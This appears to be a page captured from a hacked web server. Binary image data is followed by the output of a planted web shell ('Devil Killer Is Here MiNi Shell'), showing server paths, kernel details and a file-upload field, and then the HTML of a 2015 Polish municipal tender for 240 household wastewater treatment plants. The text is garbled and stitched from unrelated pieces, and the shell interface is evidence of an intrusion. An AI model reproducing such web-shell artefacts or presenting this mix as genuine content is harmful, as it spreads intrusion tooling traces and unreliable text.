JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150304/30339-N-2015.html

<p class="kh_header"><b>Sokołów Podlaski: Budowa przydomowych oczyszczalni ścieków na terenie                  
Gminy Sokołów Podlaski</b><br>
<b>Numer ogłoszenia: 30339 - 2015; data zamieszczenia: 04.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sokołów Podlaski , ul. Wolności 44, 08-300 Sokołów Podlaski, woj. mazowieckie, tel. 25 781-26-10, faks 25 781-26-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminasokolowpodl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków na terenie                  
Gminy Sokołów Podlaski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
1.	Przedmiotem zamówienia są roboty budowlane projektowane przez Wykonawcę polegające na dostawie, montażu i uruchomieniu kompletnych Przydomowych Biologicznych Oczyszczalni Ścieków (PBOŚ) spełniających wymogi zharmonizowanej normy PN-EN 12566-3+A2:2013. Wymaga się, aby oferta zawierała pełny raport badań PBOŚ wraz z raportami cząstkowymi potwierdzający zgodność produktu z normą PN-EN 12566-3+A2:2013, załącznik B - procedura badania skuteczności oczyszczania, wystawiony przez laboratorium notyfikowane przez Komisję Europejską, wydawaną dla konkretnego typoszeregu urządzeń. Posiadanie ww dokumentu jednoznaczne jest z możliwością oznakowania wyrobu znakiem CE.
2.	PBOŚ zlokalizowane zostaną na terenie Gminy Sokołów Podlaski. Wykaz działek, na których nastąpi montaż PBOŚ zawiera Dokumentacja Projektowa. 
3.	Przedmiot zamówienia obejmuje:
1)	zakup, dostawę, montaż, podłączenie i uruchomienie 240 sztuk PBOŚ, wraz z systemem rozsączania, przepompowniami ścieków, szafkami sterowniczymi i systemem wentylacji oczyszczalni, zgodnie z harmonogramem prac ustalonym przez Zamawiającego,
2)	wykonanie wszystkich instalacji wodno-kanalizacyjnych, elektrycznych i wentylacyjnych od budynku do PBOŚ niezbędnych do prawidłowego funkcjonowania oczyszczalni,
3)	utrzymanie zaplecza budowy, 
4)	prace montażowe, prace związane z usadowieniem oczyszczalni oraz wyrównaniem terenu,
5)	zapewnienie dozoru a także właściwych warunków bezpieczeństwa i higieny pracy,
6)	utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych, oraz usuwania na bieżąco zbędnych materiałów, odpadów i śmieci, 
7)	naprawa i doprowadzenie do stanu pierwotnego w przypadku wystąpienia jakichkolwiek zniszczeń lub uszkodzenia powstałych w toku realizacji,
8)	przeprowadzenie szkolenia dla wszystkich użytkowników PBOŚ w zakresie sposobu ich użytkowania oraz przygotowanie i przekazanie szczegółowej instrukcji obsługi w języku polskim, 
9)	przeprowadzenie szkolenia dla serwisantów PBOŚ (min. 2 osoby wskazane przez Zamawiającego), 
10)	pełna obsługa geodezyjna na etapie wykonawstwa robót i inwentaryzacja powykonawcza,
11)	przeprowadzenie prób końcowych i nadzór nad próbami eksploatacyjnymi, 
12)	raport porealizacyjny, w którym zaprezentowane zostaną przez Wykonawcę wyniki w zakresie pozwalającym na stwierdzenie dotrzymania parametrów oczyszczenia ścieków zgodnych z rozporządzeniem Ministra Środowiska w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z 2014 r., poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika nr 1 do ww. aktu wykonawczego, wraz z listą wykonanych instalacji i ich elementów oraz warunkami poprawnej eksploatacji,
13)	w terminie do 22.05.2015 r. Wykonawca przedstawi wyniki badań (wykonanych przez akredytowane laboratorium) ścieków oczyszczonych z 24 (wskazanych przez Zamawiającego) wykonanych przydomowych oczyszczalni, potwierdzające, że jakość ścieków jest zgodna z wymogami zawartymi w rozporządzeniu Ministra Środowiska w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z 2014 r., poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika nr 1 do ww. aktu wykonawczego,
14)	Przed zakończeniem terminu obowiązywania gwarancji Wykonawca przedstawi wyniki badań (wykonanych przez akredytowane laboratorium) ścieków oczyszczonych z 15% (wskazanych przez Zamawiającego) wykonanych przydomowych oczyszczalni, potwierdzające, że jakość ścieków jest zgodna z wymogami zawartymi w rozporządzeniu Ministra Środowiska w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z 2014 r., poz. 1800), jak dla oczyszczani poniżej 2000 RLM wg Załącznika nr 1 do ww. aktu wykonawczego. 
4.	Wykonawca obejmie gwarancją całość przedmiotu zamówienia na okres min. 3 lat, licząc od daty odbioru bez zastrzeżeń całości zamówienia, wystawiając oddzielne na każda wykonaną PBOŚ kartę gwarancyjną.   
5.	Szczegółowe wymagania techniczne PBOŚ i warunki równoważności:
1)	przydomowa oczyszczalnia ścieków będzie reaktorem biologicznym  składającym się z jednego lub kilku zbiorników pracujących w ustalonych fazach,
2)	oczyszczalnię ścieków może tworzyć pojedynczy zbiornik monolityczny lub zespół zbiorników, które powinny być wykonane z polimerobetonu, z żywic lub ze stali kwasoodpornej. Nie dopuszcza się zbiorników oczyszczalni wykonanych z polietylenu z uwagi na dominujący rodzaj gruntów ciężkich jakim są gliny i grunty gliniaste,
3)	wytrzymałość i pozostałe parametry zbiornika będą zapewniać możliwość montażu go na głębokości min. 1,0m. p.p.t. licząc od wlotu ścieków, bez konieczności stosowania dodatkowych płyt i elementów odciążających, 
4)	urządzenia oczyszczalni powinny być bezobsługowe w okresach pomiędzy przeglądami serwisowymi, tzn. nie mogą wymagać ingerencji użytkownika zakładając iż oczyszczalnia użytkowana będzie zgodnie z wymaganiami DTR urządzeń, przeglądy serwisowe nie powinny być częstsze niż 2 razy na rok,
5)	urządzenie powinno być oszczędne energetycznie - zużycie energii nie powinno przekraczać 1,5 kWh/dobę w trybie pracy normalnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.00.00.00-7, 45.11.12.00-0, 45.23.24.21-9, 39.35.00.00-0, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 40.000,00zł. (słownie: czterdzieści tysięcy złotych zero groszy)
2.	Wadium wnosi się przed upływem terminu składania ofert. 
3.	Wadium może być wniesione w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm.).
4.	Wadium wniesione w pieniądzu wpłaca się przelewem na rachunek bankowy Gminy Sokołów Podlaski, w Powiatowym Banku Spółdzielczym w Sokołowie Podlaskim,                 nr rachunku 08 9221 0000 0016 7367 2000 0010 z dopiskiem Wadium do przetargu na budowę przydomowych oczyszczalni ścieków na terenie Gminy Sokołów Podlaski. Kserokopię dowodu wpłaty należy dołączyć do oferty. 
5.	W przypadku wniesienia wadium w pieniądzu, kwota określona w pkt. 1 musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert. 
6.	W przypadku wniesienia wadium w pozostałych dopuszczalnych formach określonych w pkt. 3, dokument (oryginał) wadium należy również dołączyć do oferty. 
7.	Poręczenie lub gwarancja, o których mowa powyżej, winny być ważne przez okres ważności oferty, winny dotyczyć konkretnego zamówienia i zawierać klauzulę o dostępności środków przez Zamawiającego w okresie postępowania o udzielenie zamówienia publicznego bez spełnienia jakichkolwiek warunków dodatkowych.
8.	Wadium zostanie zwrócone w terminach unormowanych w art. 46 ustawy Pzp
9.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana: 
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	odmówi zawarcia ubezpieczenia budowlano- montażowego od wszelkich ryzyk przez podpisaniem umowy,
c)	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
d)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
10.	Zamawiający zatrzyma wadium wraz z odsetkami również jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 tej ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że posiada doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert, przynajmniej dwóch robót polegających na dostawie i montażu PBOŚ, w tym jedna na co najmniej 200 szt. PBOŚ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, gdy ten wykaże się dysponowaniem osobami posiadającymi uprawnienia w specjalności:
a.	Kierownik budowy (min. 1 osoba): uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z obowiązującym w tym zakresie Rozporządzeniem Ministra Transportu i Budownictwa, lub odpowiadające im ważne uprawnienia budowlane o których mowa wydane na podstawie wcześniej obowiązujących przepisów lub równoważne obowiązujące w Krajach Unii Europejskiej,
b.	Elektryk (min. 1 osoba): uprawnienia SEP do 1 kV E i D zgodnie z obowiązującym w tym zakresie Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej lub równoważne obowiązujące w Krajach Unii Europejskiej. 
Zamawiający dopuszcza połączenie funkcji poszczególnych osób od warunkiem spełnienia przez osobę łączącą funkcje wszystkich warunków wymaganych dla tych funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową na kwotę nie niższą niż 1.000.000,00 zł. (słownie: jeden milion złotych zero groszy)
Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 2.000.000,00 zł (słownie: dwa miliony złotych zero groszy)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez wykonawcę w wykazie robót budowlanych oraz złożenia poświadzczeń dodtyczy robót określonych w rozdziale I pkt 1 SIWZ, tj.: przynajmniej dwóch robót polegających na dostawie i montażu PBOŚ, w tym jedna na co najmniej 200 szt. PBOŚ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	W celu potwierdzenia, iż oferowany przedmiot zamówienia odpowiada wymaganiom określonym przez Zamawiającego w SIWZ Wykonawca wraz z ofertą przedstawi:
1.1	Raport z badań PBOŚ wraz z wszystkimi raportami cząstkowymi określającymi skuteczność oczyszczania, trwałość, wytrzymałość, wodoszczelność, reakcję na ogień wraz z określeniem uwalniania substancji niebezpiecznych , z którego wynika zgodność produktu ze zharmonizowaną normą PN-EN 12566-3+A2:2013, załącznik B - procedura badania skuteczności oczyszczania, wystawiony przez laboratorium notyfikowane przez Komisję Europejską, wydawaną dla konkretnego typoszeregu urządzeń. Posiadanie ww dokumentu jednoznaczne jest z możliwością oznakowania wyrobu znakiem CE.
Zamawiający jest świadomy, iż obecnie norma PN EN 12566-3:2005+A2:2013, znajduje się w okresie przejściowym, który biegnie od 8.08.2014 do 8.08.2015r. jednakże z uwagi na zbliżający się termin zakończenia okresu przejściowego oraz z uwagi na fakt iż wiele laboratoriów posiada już notyfikację w zakresie nowej normy - wymaga się aby oczyszczalnie posiadały wszystkie badania zgodnie z normą PN-EN 12566-3:2005+A2:2013.
1.2	Deklarację właściwości użytkowych PBOŚ zgodną z Dz. U. UE Nr L 159/41(PL) z 28.5.2014 (uwzględnia zmiany opublikowane w rozporządzeniu delegowanym nr 574/2014 z dnia 21 lutego 2014 r. zmieniającym załącznik III do rozporządzenia Parlamentu Europejskiego i Rady (UE) nr 305/2011 w odniesieniu do wzoru, który należy stosować przy sporządzaniu deklaracji właściwości użytkowych wyrobów budowlanych).
1.3	Instrukcję budowy, obsługi i montażu PBOŚ, z których będą wynikały właściwości takie jak np.: rodzaj technologii, trwałość, wytrzymałość, grubość ścianek, monolityczność zbiornika oczyszczalni, metoda wytwarzania zbiornika oczyszczalni oraz będą posiadały rzuty zbiornika oczyszczalni i dokumentację fotograficzną.
1.4	Dokumentację techniczno-ruchową PBOŚ zgodną z parametrami oczyszczalni zawartymi w Raporcie z badań zgodności oczyszczalni z normą 12566-3+A2:2013,
3.	Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za niewykonane, lub nienależyte wykonanie zobowiązania.
4.	Wykonawcy wspólnie ubiegający się o zamówienie, muszą wykazać spełnienie danego warunku udziału w postępowaniu wspólnie. W takim przypadku, dokumenty na potwierdzenie spełniania warunków udziału w postępowaniu, składane są przez tego z Wykonawców, którego dotyczą.
5.	W przypadku, gdy o udzielenie zamówienia ubiegają się Wykonawcy składający wspólną ofertę np. konsorcjum, wymaga się wówczas aby każdy z jego członków osobno złożył dokumenty wymagane w pkt 1 ppkt 1.1 -1.6 niniejszego rozdziału oraz załączniki nr 1 i 3 do SIWZ. Wykonawcy wspólnie ubiegający się o zamówienie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i podpisania umowy w sprawie zamówienia publicznego. Korespondencja w sprawie udzielenia zamówienia publicznego będzie prowadzona wyłącznie z pełnomocnikiem.
6.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
